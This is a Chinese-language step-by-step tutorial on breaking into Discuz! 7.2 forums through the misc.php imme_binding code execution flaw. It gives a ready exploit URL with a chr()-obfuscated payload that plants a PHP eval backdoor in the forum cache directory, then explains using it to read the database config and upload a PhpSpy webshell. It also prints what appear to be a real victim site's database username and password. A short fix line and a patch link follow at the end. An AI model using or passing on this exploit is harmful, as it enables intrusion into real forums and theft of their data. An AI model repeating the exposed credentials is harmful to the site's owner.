Discuz 7.2漏洞入侵图解

Discuz 7.2漏洞入侵图解

找到一个论坛,注册一个账号

注册好后,使用exp

复制以下代码:

http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}

以上为exp

如若此处为空白,说明成功

存在该文件

php一句话连接forumdata/cache/usergroup_01.php

读取数据库连接文件

在模块中选择读取文件,并输入数据库连接文件的地址“****/dc/config.inc.php”,如图8所示,成功获取该论坛数据库的敏感信息:
$dbhost = 'localhost'; // 数据库服务器
$dbuser = 'skycheer'; // 数据库用户名
$dbpw = 'sky0127'; // 数据库密码
$dbname = 'skycheer'; // 数据库名
$pconnect = 0;

上传大马

使用一句话管理实在是不方便,在功能模块中选择上传文件,使用空的路径直接将本地的大马上传到一句话木马所在的路径,上传成功后直接访问,如图9所示,成功得到我们熟悉的PhpSpy ver 2008界面。至此已经获取Discuz!7.2版本的Webshell,大家都知道Discuz!论坛的Webshell很难拿到,因此本漏洞的珍稀程度可想而知。

Discuz!7.1&7.2远程溢出漏洞出来后,国内有关Discuz!的大中小论坛基本没有什么幸免,安全做的好的去掉了cache的执行权限,将其权限设置为无,逃过劫难。

友情提示:非法入侵他人站点,一切后果自负 上文出自77169 /techweb

利用:注册后登陆 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} 任意执行。

DZ 7.1、7.2 针对getshell的修复方法:
在common.inc.php上面加上$response=$scriptlang=array(); 

这个洞t00ls团队发现的,DZ官方已经被人日过了。

官方补丁:http://www.discuz.net/thread-1537673-1-1.html

=============================================================================

截止到今天有这个洞的Dz论坛已经很少了,我刚才在谷歌翻了几篇,只找到一个有洞的,

其他的都补上了,可惜的是这个有洞的论坛用一句话连接后居然不显示文件路径,真是杯具!

你可能感兴趣的:(漏洞)